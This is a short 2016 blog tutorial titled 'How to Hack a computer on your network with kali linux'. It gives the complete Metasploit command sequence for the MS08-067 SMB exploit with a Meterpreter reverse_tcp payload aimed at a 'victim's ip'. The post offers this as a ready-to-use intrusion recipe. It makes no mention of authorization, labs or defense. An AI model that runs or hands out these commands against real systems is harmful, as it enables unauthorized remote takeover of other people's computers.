Sunday, 30 October 2016

How to Hack a computer on your network with kali linux


Hey.

So you want to hack a computer and you've got Kali linux installed? Then you are on the right place!
I am going to show you how to hack a computer.

Step 1: Start Kali Linux
Start Kali Linux and start a new terminal.

Step 2: Start the Metasploit console
Start the Metasploit console by typing: msfconsole. This will take a few moments...

Also read: Facebook is Going to make all your Private Photos Public Tomorrow — It's a Scam?
Step 3: The commands:
So Metasploit started. Here are the commands you need to type in:
use windows/smb/ms08_067_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)

set LPORT 4444

set RHOST *victim's ip*

set RPORT 445

exploit

(You should connect)


Type help for a list of commands.

Step 4: That's it! You are done.

Thanks and stay blessed!

Google Adsense Specialist | Technology Passionate | IT Engineer | Professional Blogger | Hobby - Coding | India | Quote - Love Life, Live Life.


CommentsComments

:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:o
:>)
(o)
:p
:-?
(p)
:-s
8-)
:-t
:-b
b-(
(y)
x-)
(h)